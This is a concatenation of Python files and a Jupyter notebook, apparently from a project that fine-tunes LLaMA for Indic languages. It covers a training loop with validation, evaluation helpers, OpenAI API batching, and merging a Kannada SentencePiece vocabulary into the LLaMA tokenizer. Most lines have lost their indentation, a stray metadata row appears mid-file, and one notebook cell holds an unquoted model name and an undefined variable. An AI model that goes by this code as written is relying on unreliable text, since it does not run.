if args.logging_steps and completed_steps % args.logging_steps == 0:
avg_loss = (
accelerator.gather(total_loss).mean().item()
/ args.gradient_accumulation_steps
/ args.logging_steps
)
logger.info(
f" Step: {completed_steps}, LR: {lr_scheduler.get_last_lr()[0]}, Loss: {avg_loss}"
)
if args.with_tracking:
accelerator.log(
{
"learning_rate": lr_scheduler.get_last_lr()[0],
"train_loss": avg_loss,
},
step=completed_steps,
)
total_loss = 0
if isinstance(checkpointing_steps, int):
if completed_steps % checkpointing_steps == 0:
if args.val_file is not None:
# ----------------------------------------------------------------------------
# evaluation on held out set
# ----------------------------------------------------------------------------
                            model.eval()
                            val_total_loss = 0
for step, batch in enumerate(val_dataloader):
if "labels" not in batch:
batch["labels"] = batch["input_ids"].clone()
if "attention_mask" not in batch:
batch["attention_mask"] = torch.ones_like(batch["input_ids"])
with torch.inference_mode():
outputs = model(**batch, use_cache=False)
loss = outputs.loss
val_total_loss += loss.detach().float()
avg_val_loss = (
accelerator.gather(val_total_loss).mean().item()
/ args.gradient_accumulation_steps
/ len(val_dataloader)
)
logger.info(f" Step: {completed_steps}, Val Loss: {avg_val_loss}")
if args.with_tracking:
accelerator.log(
{
"val_loss": avg_val_loss,
},
step=completed_steps,
)
if avg_val_loss < best_loss:
best_loss = avg_val_loss
output_dir = f"best"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(
accelerator, model, tokenizer, output_dir, args
)
                            model.train()
                            # ----------------------------------------------------------------------------
output_dir = f"step_{completed_steps}"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, output_dir, args)
if completed_steps >= args.max_train_steps:
break
if args.checkpointing_steps == "epoch":
if args.val_file is not None:
# ----------------------------------------------------------------------------
# evaluation on held out set
# ----------------------------------------------------------------------------
                model.eval()
                val_total_loss = 0
for step, batch in enumerate(val_dataloader):
if "labels" not in batch:
batch["labels"] = batch["input_ids"].clone()
if "attention_mask" not in batch:
batch["attention_mask"] = torch.ones_like(batch["input_ids"])
with torch.inference_mode():
outputs = model(**batch, use_cache=False)
loss = outputs.loss
val_total_loss += loss.detach().float()
avg_val_loss = (
accelerator.gather(val_total_loss).mean().item()
/ args.gradient_accumulation_steps
/ len(val_dataloader)
)
logger.info(f" Step: {completed_steps}, Val Loss: {avg_val_loss}")
if args.with_tracking:
accelerator.log(
{
"val_loss": avg_val_loss,
},
step=completed_steps,
)
if avg_val_loss < best_loss:
best_loss = avg_val_loss
output_dir = f"best"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, output_dir, args)
                model.train()
                # ----------------------------------------------------------------------------
output_dir = f"epoch_{epoch}"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, output_dir, args)
if args.output_dir is not None:
if args.val_file is not None:
# ----------------------------------------------------------------------------
# evaluation on held out set
# ----------------------------------------------------------------------------
            model.eval()
            val_total_loss = 0
for step, batch in enumerate(val_dataloader):
if "labels" not in batch:
batch["labels"] = batch["input_ids"].clone()
if "attention_mask" not in batch:
batch["attention_mask"] = torch.ones_like(batch["input_ids"])
with torch.inference_mode():
outputs = model(**batch, use_cache=False)
loss = outputs.loss
val_total_loss += loss.detach().float()
avg_val_loss = (
accelerator.gather(val_total_loss).mean().item()
/ args.gradient_accumulation_steps
/ len(val_dataloader)
)
logger.info(f" Step: {completed_steps}, Val Loss: {avg_val_loss}")
if args.with_tracking:
accelerator.log(
{
"val_loss": avg_val_loss,
},
step=completed_steps,
)
if avg_val_loss < best_loss:
best_loss = avg_val_loss
output_dir = f"best"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, output_dir, args)
# ----------------------------------------------------------------------------
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, args.output_dir, args)
if args.with_tracking:
accelerator.end_training()
if __name__ == "__main__":
    main()
# File: archives/eval/utils.py
import torch
import tqdm
import json
import time
import asyncio
import os
from importlib import import_module
from transformers import StoppingCriteria
from eval.finetune import encode_with_prompt_completion_format
from eval.dispatch_openai_requests import (
dispatch_openai_chat_requesets,
dispatch_openai_prompt_requesets,
)
class KeyWordsCriteria(StoppingCriteria):
def __init__(self, stop_id_sequences):
assert isinstance(
stop_id_sequences[0], list
), "stop_id_sequences should be a list of list of ids"
self.stop_sequences = stop_id_sequences
def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs) -> bool:
sequences_should_be_stopped = []
for i in range(input_ids.shape[0]):
sequence_should_be_stopped = False
for stop_sequence in self.stop_sequences:
if input_ids[i][-len(stop_sequence) :].tolist() == stop_sequence:
sequence_should_be_stopped = True
break
sequences_should_be_stopped.append(sequence_should_be_stopped)
return all(sequences_should_be_stopped)
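# Minimal usage sketch for KeyWordsCriteria (names below are illustrative): stop
# sequences are lists of token ids, typically produced by encoding each stop
# string without special tokens, and generation halts once every sequence in the
# batch ends with one of them.
#
#   stop_id_sequences = [
#       tokenizer.encode(s, add_special_tokens=False) for s in ["\n\n", "Question:"]
#   ]
#   outputs = model.generate(
#       input_ids,
#       stopping_criteria=[KeyWordsCriteria(stop_id_sequences)],
#       max_new_tokens=256,
#   )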
@torch.no_grad()
def generate_completions(
model,
tokenizer,
prompts,
batch_size=1,
stop_id_sequences=None,
add_special_tokens=True,
disable_tqdm=False,
**generation_kwargs,
):
generations = []
if not disable_tqdm:
progress = tqdm.tqdm(total=len(prompts), desc="Generating Completions")
num_return_sequences = generation_kwargs.get("num_return_sequences", 1)
for i in range(0, len(prompts), batch_size):
batch_prompts = prompts[i : i + batch_size]
tokenized_prompts = tokenizer(
batch_prompts,
padding="longest",
return_tensors="pt",
add_special_tokens=add_special_tokens,
)
batch_input_ids = tokenized_prompts.input_ids
attention_mask = tokenized_prompts.attention_mask
if model.device.type == "cuda":
batch_input_ids = batch_input_ids.cuda()
attention_mask = attention_mask.cuda()
try:
batch_outputs = model.generate(
input_ids=batch_input_ids,
attention_mask=attention_mask,
stopping_criteria=[KeyWordsCriteria(stop_id_sequences)]
if stop_id_sequences
else None,
**generation_kwargs,
)
# the stopping criteria is applied at batch level, so if other examples are not stopped, the entire batch will continue to generate.
# so some outputs still have the stop sequence, which we need to remove.
if stop_id_sequences:
for output_idx in range(batch_outputs.shape[0]):
for token_idx in range(batch_input_ids.shape[1], batch_outputs.shape[1]):
if any(
batch_outputs[
output_idx, token_idx : token_idx + len(stop_sequence)
].tolist()
== stop_sequence
for stop_sequence in stop_id_sequences
):
batch_outputs[output_idx, token_idx:] = tokenizer.pad_token_id
break
# remove the prompt from the output
# we need to re-encode the prompt because we need to make sure the special tokens are treated the same way as in the outputs.
            # we changed our previous way of truncating the output token ids directly because some tokenizers (e.g., llama) won't add a space token before the first token.
# space is important for some tasks (e.g., code completion).
batch_outputs = tokenizer.batch_decode(batch_outputs, skip_special_tokens=True)
batch_prompts = tokenizer.batch_decode(batch_input_ids, skip_special_tokens=True)
# duplicate the prompts to match the number of return sequences
batch_prompts = [
prompt for prompt in batch_prompts for _ in range(num_return_sequences)
]
batch_generations = [
output[len(prompt) :] for prompt, output in zip(batch_prompts, batch_outputs)
]
except Exception as e:
print("Error when generating completions for batch:")
print(batch_prompts)
print("Error message:")
print(e)
print("Use empty string as the completion.")
batch_generations = [""] * len(batch_prompts) * num_return_sequences
generations += batch_generations
# for prompt, generation in zip(batch_prompts, batch_generations):
# print("========")
# print(prompt)
# print("--------")
# print(generation)
if not disable_tqdm:
progress.update(len(batch_prompts) // num_return_sequences)
assert (
len(generations) == len(prompts) * num_return_sequences
), "number of generations should be equal to number of prompts * num_return_sequences"
return generations
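# Example call (illustrative; assumes model/tokenizer come from
# load_hf_lm_and_tokenizer below, so the tokenizer already pads on the left):
#
#   generations = generate_completions(
#       model,
#       tokenizer,
#       prompts=["Translate to Kannada: Hello.", "2 + 2 ="],
#       batch_size=2,
#       stop_id_sequences=[tokenizer.encode("\n", add_special_tokens=False)],
#       max_new_tokens=64,
#       do_sample=False,
#   )
#   # len(generations) == len(prompts) * num_return_sequences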
@torch.no_grad()
def get_next_word_predictions(
model,
tokenizer,
prompts,
candidate_token_ids=None,
batch_size=1,
return_token_predictions=False,
add_special_tokens=True,
disable_tqdm=False,
):
predictions, probs = [], []
if not disable_tqdm:
progress = tqdm.tqdm(total=len(prompts), desc="Getting Predictions")
for i in range(0, len(prompts), batch_size):
batch_prompts = prompts[i : i + batch_size]
tokenized_prompts = tokenizer(
batch_prompts,
padding="longest",
return_tensors="pt",
add_special_tokens=add_special_tokens,
)
batch_input_ids = tokenized_prompts.input_ids
attention_mask = tokenized_prompts.attention_mask
if model.device.type == "cuda":
batch_input_ids = batch_input_ids.cuda()
attention_mask = attention_mask.cuda()
batch_logits = model(input_ids=batch_input_ids, attention_mask=attention_mask).logits[
:, -1, :
]
batch_probs = torch.softmax(batch_logits, dim=-1)
if candidate_token_ids is not None:
batch_probs = batch_probs[:, candidate_token_ids]
batch_prediction_indices = torch.argmax(batch_probs, dim=-1)
if return_token_predictions:
if candidate_token_ids is not None:
candidate_tokens = tokenizer.convert_ids_to_tokens(candidate_token_ids)
batch_predictions = [candidate_tokens[idx] for idx in batch_prediction_indices]
else:
batch_predictions = tokenizer.convert_ids_to_tokens(batch_prediction_indices)
predictions += batch_predictions
else:
predictions += batch_prediction_indices.tolist()
probs += batch_probs.tolist()
if not disable_tqdm:
progress.update(len(batch_prompts))
assert len(predictions) == len(
prompts
), "number of predictions should be equal to number of prompts"
return predictions, probs
@torch.no_grad()
def score_completions(model, tokenizer, scoring_examples, disable_tqdm=False):
"""
Each scoring example is a dict, which contains the following keys:
- prompt: the prompt to score
- completions: a list of completions to score
"""
if not disable_tqdm:
progress = tqdm.tqdm(total=len(scoring_examples), desc="Scoring Completions")
# unroll the scoring examples
unrolled_examples = []
for scoring_example in scoring_examples:
prompt = scoring_example["prompt"]
for completion in scoring_example["completions"]:
unrolled_examples.append({"prompt": prompt, "completion": completion})
scores = []
# currently we don't support batching, because we want to directly use the loss returned by the model to score each completion.
for unrolled_example in unrolled_examples:
encoded_example = encode_with_prompt_completion_format(
unrolled_example, tokenizer, max_seq_length=None
)
# unsqueeze the batch dimension
for key, value in encoded_example.items():
encoded_example[key] = value.unsqueeze(0)
if model.device.type == "cuda":
encoded_example = {key: value.cuda() for key, value in encoded_example.items()}
outputs = model(**encoded_example)
loss = outputs.loss
scores.append(-loss.item())
if not disable_tqdm:
progress.update(1)
# roll up the scores
rolled_up_scores = {}
for unrolled_example, score in zip(unrolled_examples, scores):
prompt = unrolled_example["prompt"]
completion = unrolled_example["completion"]
if prompt not in rolled_up_scores:
rolled_up_scores[prompt] = {}
rolled_up_scores[prompt][completion] = score
return rolled_up_scores
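# Example of the expected input/output shapes (values are made up for
# illustration; each returned score is the negated mean token loss, so a higher
# score means the completion is more likely under the model):
#
#   scoring_examples = [
#       {"prompt": "The capital of France is", "completions": [" Paris.", " Rome."]}
#   ]
#   scores = score_completions(model, tokenizer, scoring_examples)
#   # scores == {"The capital of France is": {" Paris.": -0.4, " Rome.": -3.9}}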
def load_hf_lm_and_tokenizer(
model_name_or_path,
tokenizer_name_or_path=None,
device_map="auto",
torch_dtype="auto",
load_in_8bit=False,
convert_to_half=False,
gptq_model=False,
use_fast_tokenizer=True,
padding_side="left",
):
from transformers import AutoModelForCausalLM, AutoTokenizer, OPTForCausalLM, GPTNeoXForCausalLM
if gptq_model:
from auto_gptq import AutoGPTQForCausalLM
model_wrapper = AutoGPTQForCausalLM.from_quantized(
model_name_or_path, device="cuda:0", use_triton=True
)
model = model_wrapper.model
elif load_in_8bit:
model = AutoModelForCausalLM.from_pretrained(
model_name_or_path, device_map=device_map, load_in_8bit=True
)
else:
if device_map:
model = AutoModelForCausalLM.from_pretrained(
model_name_or_path, device_map=device_map, torch_dtype=torch_dtype
)
else:
model = AutoModelForCausalLM.from_pretrained(
model_name_or_path, torch_dtype=torch_dtype
)
if torch.cuda.is_available():
model = model.cuda()
if convert_to_half:
model = model.half()
model.eval()
if not tokenizer_name_or_path:
tokenizer_name_or_path = model_name_or_path
try:
tokenizer = AutoTokenizer.from_pretrained(
tokenizer_name_or_path, use_fast=use_fast_tokenizer
)
    except Exception:
# some tokenizers (e.g., GPTNeoXTokenizer) don't have the slow or fast version, so we just roll back to the default one
tokenizer = AutoTokenizer.from_pretrained(tokenizer_name_or_path)
# set padding side to left for batch generation
tokenizer.padding_side = padding_side
# set pad token to eos token if pad token is not set (as is the case for llama models)
if tokenizer.pad_token is None:
tokenizer.pad_token = tokenizer.eos_token
tokenizer.pad_token_id = tokenizer.eos_token_id
# for OPT and Pythia models, we need to set tokenizer.model_max_length to model.config.max_position_embeddings
# to avoid wrong embedding index.
if isinstance(model, GPTNeoXForCausalLM) or isinstance(model, OPTForCausalLM):
tokenizer.model_max_length = model.config.max_position_embeddings
print(
"Set tokenizer.model_max_length to model.config.max_position_embeddings: {}".format(
model.config.max_position_embeddings
)
)
return model, tokenizer
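# Typical usage (illustrative arguments):
#
#   model, tokenizer = load_hf_lm_and_tokenizer(
#       "meta-llama/Llama-2-7b-hf",
#       torch_dtype=torch.bfloat16,
#       load_in_8bit=False,
#   )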
def query_openai_chat_model(
engine,
instances,
output_path=None,
batch_size=10,
retry_limit=5,
reuse_existing_outputs=True,
**completion_kwargs,
):
"""
Query OpenAI chat model and save the results to output_path.
`instances` is a list of dictionaries, each dictionary contains a key "prompt" and a key "id".
"""
existing_data = {}
if reuse_existing_outputs and output_path is not None and os.path.exists(output_path):
with open(output_path, "r") as f:
for line in f:
instance = json.loads(line)
existing_data[instance["id"]] = instance
# by default, we use temperature 0.0 to get the most likely completion.
if "temperature" not in completion_kwargs:
completion_kwargs["temperature"] = 0.0
results = []
if output_path is not None:
fout = open(output_path, "w")
retry_count = 0
progress_bar = tqdm.tqdm(total=len(instances))
for i in range(0, len(instances), batch_size):
batch = instances[i : i + batch_size]
if all([x["id"] in existing_data for x in batch]):
results.extend([existing_data[x["id"]] for x in batch])
if output_path is not None:
for instance in batch:
fout.write(json.dumps(existing_data[instance["id"]]) + "\n")
fout.flush()
progress_bar.update(batch_size)
continue
messages_list = []
for instance in batch:
messages = [{"role": "user", "content": instance["prompt"]}]
messages_list.append(messages)
while retry_count < retry_limit:
try:
outputs = asyncio.run(
dispatch_openai_chat_requesets(
messages_list=messages_list,
model=engine,
**completion_kwargs,
)
)
retry_count = 0
break
except Exception as e:
retry_count += 1
print(f"Error while requesting OpenAI API.")
print(e)
print(f"Sleep for {30*retry_count} seconds.")
time.sleep(30 * retry_count)
print(f"Retry for the {retry_count} time.")
if retry_count == retry_limit:
raise RuntimeError(
f"Failed to get response from OpenAI API after {retry_limit} retries."
)
assert len(outputs) == len(batch)
for instance, output in zip(batch, outputs):
instance[f"output"] = output["choices"][0]["message"]["content"]
instance["response_metadata"] = output
results.append(instance)
if output_path is not None:
fout.write(json.dumps(instance) + "\n")
fout.flush()
progress_bar.update(batch_size)
return results
def query_openai_model(
engine,
instances,
output_path=None,
batch_size=10,
retry_limit=5,
reuse_existing_outputs=True,
**completion_kwargs,
):
"""
    Query OpenAI text completion model and save the results to output_path.
`instances` is a list of dictionaries, each dictionary contains a key "prompt" and a key "id".
"""
existing_data = {}
if reuse_existing_outputs and output_path is not None and os.path.exists(output_path):
with open(output_path, "r") as f:
for line in f:
instance = json.loads(line)
existing_data[instance["id"]] = instance
# by default, we use temperature 0.0 to get the most likely completion.
if "temperature" not in completion_kwargs:
completion_kwargs["temperature"] = 0.0
results = []
if output_path is not None:
fout = open(output_path, "w")
retry_count = 0
progress_bar = tqdm.tqdm(total=len(instances))
for i in range(0, len(instances), batch_size):
batch = instances[i : i + batch_size]
if all([x["id"] in existing_data for x in batch]):
results.extend([existing_data[x["id"]] for x in batch])
if output_path is not None:
for instance in batch:
fout.write(json.dumps(existing_data[instance["id"]]) + "\n")
fout.flush()
progress_bar.update(batch_size)
continue
messages_list = []
for instance in batch:
messages = instance["prompt"]
messages_list.append(messages)
while retry_count < retry_limit:
try:
outputs = asyncio.run(
dispatch_openai_prompt_requesets(
prompt_list=messages_list,
model=engine,
**completion_kwargs,
)
)
retry_count = 0
break
except Exception as e:
retry_count += 1
print(f"Error while requesting OpenAI API.")
print(e)
print(f"Sleep for {30*retry_count} seconds.")
time.sleep(30 * retry_count)
print(f"Retry for the {retry_count} time.")
if retry_count == retry_limit:
raise RuntimeError(
f"Failed to get response from OpenAI API after {retry_limit} retries."
)
assert len(outputs) == len(batch)
for instance, output in zip(batch, outputs):
instance[f"output"] = output["choices"][0]["text"]
instance["response_metadata"] = output
results.append(instance)
if output_path is not None:
fout.write(json.dumps(instance) + "\n")
fout.flush()
progress_bar.update(batch_size)
return results
def dynamic_import_function(function_path):
"""
Dynamically import a function from a path string (e.g., "module.submodule.my_function")
"""
module_path, function_name = function_path.rsplit(".", 1)
module = import_module(module_path)
function = getattr(module, function_name)
    return function
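# Example (using a standard-library function so the sketch is self-contained; in
# the eval scripts this is typically used to resolve chat-format helpers from a
# dotted path supplied on the command line):
#
#   join = dynamic_import_function("os.path.join")
#   join("a", "b")  # -> "a/b"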
# File: archives/eval/dispatch_openai_requests.py
"""
This file is copied and modified from https://gist.github.com/neubig/80de662fb3e225c18172ec218be4917a.
Thanks to Graham Neubig for sharing the original code.
"""
import openai
import asyncio
from typing import Any, List, Dict
async def dispatch_openai_chat_requesets(
messages_list: List[List[Dict[str, Any]]],
model: str,
**completion_kwargs: Any,
) -> List[Any]:
"""Dispatches requests to OpenAI chat completion API asynchronously.
Args:
messages_list: List of messages to be sent to OpenAI chat completion API.
model: OpenAI model to use.
completion_kwargs: Keyword arguments to be passed to OpenAI ChatCompletion API. See https://platform.openai.com/docs/api-reference/chat for details.
Returns:
List of responses from OpenAI API.
"""
async_responses = [
openai.ChatCompletion.acreate(
model=model,
messages=x,
**completion_kwargs,
)
for x in messages_list
]
return await asyncio.gather(*async_responses)
async def dispatch_openai_prompt_requesets(
prompt_list: List[str],
model: str,
**completion_kwargs: Any,
) -> List[Any]:
"""Dispatches requests to OpenAI text completion API asynchronously.
Args:
prompt_list: List of prompts to be sent to OpenAI text completion API.
model: OpenAI model to use.
completion_kwargs: Keyword arguments to be passed to OpenAI text completion API. See https://platform.openai.com/docs/api-reference/completions for details.
Returns:
List of responses from OpenAI API.
"""
async_responses = [
openai.Completion.acreate(
model=model,
prompt=x,
**completion_kwargs,
)
for x in prompt_list
]
return await asyncio.gather(*async_responses)
if __name__ == "__main__":
chat_completion_responses = asyncio.run(
dispatch_openai_chat_requesets(
messages_list=[
[{"role": "user", "content": "Write a poem about asynchronous execution."}],
[{"role": "user", "content": "Write a poem about asynchronous pirates."}],
],
model="gpt-3.5-turbo",
temperature=0.3,
max_tokens=200,
top_p=1.0,
)
)
for i, x in enumerate(chat_completion_responses):
print(f"Chat completion response {i}:\n{x['choices'][0]['message']['content']}\n\n")
prompt_completion_responses = asyncio.run(
dispatch_openai_prompt_requesets(
prompt_list=[
"Write a poem about asynchronous execution.\n",
"Write a poem about asynchronous pirates.\n",
],
model="text-davinci-003",
temperature=0.3,
max_tokens=200,
top_p=1.0,
)
)
for i, x in enumerate(prompt_completion_responses):
print(f"Prompt completion response {i}:\n{x['choices'][0]['text']}\n\n") | 2,995 | Python | .py | 80 | 29.5 | 164 | 0.631198 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
# File: archives/tokenisation/test.py
import argparse
import sentencepiece as spm
class SentencePieceEncoder:
def __init__(self, model_path):
self.model_path = model_path
def encode_text(self, input_text):
sp = spm.SentencePieceProcessor(model_file=self.model_path)
encoded_text = sp.encode(input_text, out_type=str)
return encoded_text
def run(self):
parser = argparse.ArgumentParser(
description="Encode text using a SentencePiece model."
)
parser.add_argument(
"--model-path",
required=True,
help="Path to the trained SentencePiece model file.",
)
parser.add_argument(
"--input-text",
required=True,
help="Text to be encoded.",
)
args = parser.parse_args()
self.model_path = args.model_path
encoded_text = self.encode_text(args.input_text)
print(encoded_text)
if __name__ == "__main__":
sp_encoder = SentencePieceEncoder(
model_path="tamil_sp.model"
) # Provide the path to your trained model here
sp_encoder.run()
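# Example invocation (illustrative paths/text):
#   python test.py --model-path tamil_sp.model --input-text "வணக்கம்"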
# File: archives/tokenisation/tokenizer.ipynb
{
"cells": [
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"32000 20000\n",
"['<s>', '</s>', '<unk>']\n",
"[1, 2, 0]\n",
"{'bos_token': '<s>', 'eos_token': '</s>', 'unk_token': '<unk>'}\n"
]
}
],
"source": [
"# Based on https://github.com/ymcui/Chinese-LLaMA-Alpaca/blob/main/scripts/merge_tokenizer/merge_tokenizers.py\n",
"import os\n",
"\n",
"os.environ[\"PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION\"] = \"python\"\n",
"import argparse\n",
"\n",
"import sentencepiece as spm\n",
"from sentencepiece import sentencepiece_model_pb2 as sp_pb2_model\n",
"from transformers import LlamaTokenizer\n",
"\n",
"llama_tokenizer_dir = \"meta-llama/Llama-2-7b-hf\"\n",
"kannada_sp_model_file = \"./kannada_tokeniser_models/kannada_sp.model\"\n",
"\n",
"# load\n",
"llama_tokenizer = LlamaTokenizer.from_pretrained(meta-llama/Llama-2-7b-hf)\n",
"# kannada_sp_model = spm.SentencePieceProcessor()\n",
"# kannada_sp_model.Load(kannada_sp_model_file)\n",
"\n",
"llama_spm = sp_pb2_model.ModelProto()\n",
"llama_spm.ParseFromString(llama_tokenizer.sp_model.serialized_model_proto())\n",
"\n",
"kannada_spm = sp_pb2_model.ModelProto()\n",
"kannada_spm.ParseFromString(kannada_sp_model.serialized_model_proto())\n",
"\n",
"# print number of tokens\n",
"print(len(llama_tokenizer), len(kannada_sp_model))\n",
"print(llama_tokenizer.all_special_tokens)\n",
"print(llama_tokenizer.all_special_ids)\n",
"print(llama_tokenizer.special_tokens_map)\n"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"32000\n",
"Before:32000\n",
"New model pieces: 49600\n",
"Added 17600 Tokens\n",
"Common Tokens 2400\n"
]
}
],
"source": [
"## Add kannada tokens to LLaMA tokenizer\n",
"llama_spm_tokens_set = set(p.piece for p in llama_spm.pieces)\n",
"print(len(llama_spm_tokens_set))\n",
"print(f\"Before:{len(llama_spm_tokens_set)}\")\n",
"for p in kannada_spm.pieces:\n",
" piece = p.piece\n",
" if piece not in llama_spm_tokens_set:\n",
" new_p = sp_pb2_model.ModelProto().SentencePiece()\n",
" new_p.piece = piece\n",
" new_p.score = 0\n",
" llama_spm.pieces.append(new_p)\n",
"print(f\"New model pieces: {len(llama_spm.pieces)}\")\n",
"\n",
"print(f\"Added {len(llama_spm.pieces)-len(llama_spm_tokens_set)} Tokens\")\n",
"print(f\"Common Tokens {len(kannada_sp_model)-(len(llama_spm.pieces)-len(llama_spm_tokens_set))}\")"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"You are using the default legacy behaviour of the <class 'transformers.models.llama.tokenization_llama.LlamaTokenizer'>. This is expected, and simply means that the `legacy` (previous) behavior will be used so nothing changes for you. If you want to use the new behaviour, set `legacy=False`. This should only be set if you understand what it means, and thoroughly read the reason why this was added as explained in https://github.com/huggingface/transformers/pull/24565\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"kannada-LLaMA tokenizer has been saved to final_tokenizer_hf\n"
]
}
],
"source": [
"## Save\n",
"output_sp_dir = \"final_tokenizer_sp\"\n",
"output_hf_dir = \"final_tokenizer_hf\" # the path to save kannada-LLaMA tokenizer\n",
"os.makedirs(output_sp_dir, exist_ok=True)\n",
"with open(output_sp_dir + \"/kannada_llama.model\", \"wb\") as f:\n",
" f.write(llama_spm.SerializeToString())\n",
"tokenizer = LlamaTokenizer(vocab_file=output_sp_dir + \"/kannada_llama.model\")\n",
"\n",
"tokenizer.save_pretrained(output_hf_dir)\n",
"print(f\"kannada-LLaMA tokenizer has been saved to {output_hf_dir}\")"
]
},
{
"cell_type": "code",
"execution_count": 17,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['<s>', '</s>', '<unk>']\n"
]
}
],
"source": [
"# Test\n",
"from transformers import AutoTokenizer, LlamaTokenizer\n",
"\n",
"llama_tokenizer = LlamaTokenizer.from_pretrained(\"meta-llama/Llama-2-7b-hf\")\n",
"kannada_llama_tokenizer = LlamaTokenizer.from_pretrained(\"Cognitive-Lab/Ambari-7B-base-v0.1\")\n",
"gemma_tokenizer = AutoTokenizer.from_pretrained(\"google/gemma-7b\")\n",
"print(tokenizer.all_special_tokens)"
]
},
{
"cell_type": "code",
"execution_count": 18,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[1, 2, 0]\n",
"{'bos_token': '<s>', 'eos_token': '</s>', 'unk_token': '<unk>'}\n",
"Test text:\n",
" \n",
"ರಸ್ತುತ ದಿನಗಳಲ್ಲಿ ಸ್ಮಾರ್ಟ್ಫೋನ್ಗಳು ಮಾತ್ರವಲ್ಲ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳು ಕೂಡ ಸಿಕ್ಕಾಪಟ್ಟೆ ಸೌಂಡ್ ಮಾಡುತ್ತಿವೆ. ಫಿಟ್ನೆಸ್ ಆಧಾರಿತ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಗೆ ಟೆಕ್ ವಲಯದಲ್ಲಿ ಭಾರಿ ಬೇಡಿಕೆ ಇದೆ. ಇದೇ ಕಾರಣಕ್ಕೆ ಹಲವು ಕಂಪೆನಿಗಳು ವೈವಿಧ್ಯಮಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ಪರಿಚಯಿಸಿವೆ. ಇವುಗಳಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಕೂಡ ಬಳಕೆದಾರರ ನೆಚ್ಚಿನ ಬ್ರಾಂಡ್ ಎನಿಸಿಕೊಂಡಿದೆ. ಸದ್ಯ ಅಮಾಜ್ಫಿಟ್ ತನ್ನ ವಿಭಿನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಂದ ಗುರುತಿಸಿಕೊಂಡಿದೆ. ಇದೀಗ ತನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಭರ್ಜರಿ ಡಿಸ್ಕೌಂಟ್ ಅನ್ನು ನೀಡುತ್ತಿದೆ.\n",
"ಹೌದು, ಅಮಾಜ್ಫಿಟ್ ಕಂಪೆನಿ ತನ್ನ ಕೆಲವು ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಬಿಗ್ ಡಿಸ್ಕೌಂಟ್ ನೀಡುತ್ತಿದೆ. ನೀವು ಕೂಡ ಅಮಾಜ್ಫಿಟ್ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಖರೀದಿಸಲು ಬಯಸಿದರೆ ಇದು ಉತ್ತಮ ಸಮಯವಾಗಿದೆ. ಅದರಲ್ಲೂ ಜನಪ್ರಿಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಾದ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ, ಬಿಪ್ ಯು ಪ್ರೊ ಮತ್ತು ಬಿಪ್ಯು ವಾಚ್ಗಳಿಗೆ ರಿಯಾಯಿತಿ ಘೋಷಿಸಿದೆ. ಹಾಗಾದ್ರೆ ಅಮಾಜ್ಫಿಟ್ ವಾಚ್ಗಳಿಗೆ ಯಾವೆಲ್ಲಾ ರಿಯಾಯಿತಿ ದೊರೆಯುತ್ತಿದೆ ಅನ್ನೊದನ್ನ ಈ ಲೇಖನದಲ್ಲಿ ತಿಳಿಸಿಕೊಡ್ತೀವಿ ಓದಿರಿ.\n",
"ಆನ್ಲೈನ್ ಶಾಪಿಂಗ್ ದೈತ್ಯ ಅಮೆಜಾನ್ ಸೈಟ್ನಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಬ್ರಾಂಡ್ ಡೇ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಅಲ್ಲದೆ ಅಮಾಜ್ ಫಿಟ್ ನ ಅಧಿಕೃತ ವೆಬ್ ಸೈಟ್ ನಲ್ಲಿ ಕೂಡ ರಿಯಾಯಿತಿ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಈ ಸೇಲ್ ಇದೇ ಸೆಪ್ಟೆಂಬರ್ 12 ರವರೆಗೆ ನಡೆಯಲಿದೆ. ಇದರಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ ಅಮೆಜಾನ್ನಲ್ಲಿ ಮಾತ್ರ ಲಭ್ಯವಿದೆ. ಆದರೆ ಬಿಪ್ ಯು ಮತ್ತು ಬಿಪ್ ಯು ಪ್ರೊ ಫ್ಲಿಪ್ಕಾರ್ಟ್ನಲ್ಲಿ ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಲಭ್ಯವಾಗಲಿದೆ.\n",
"\n",
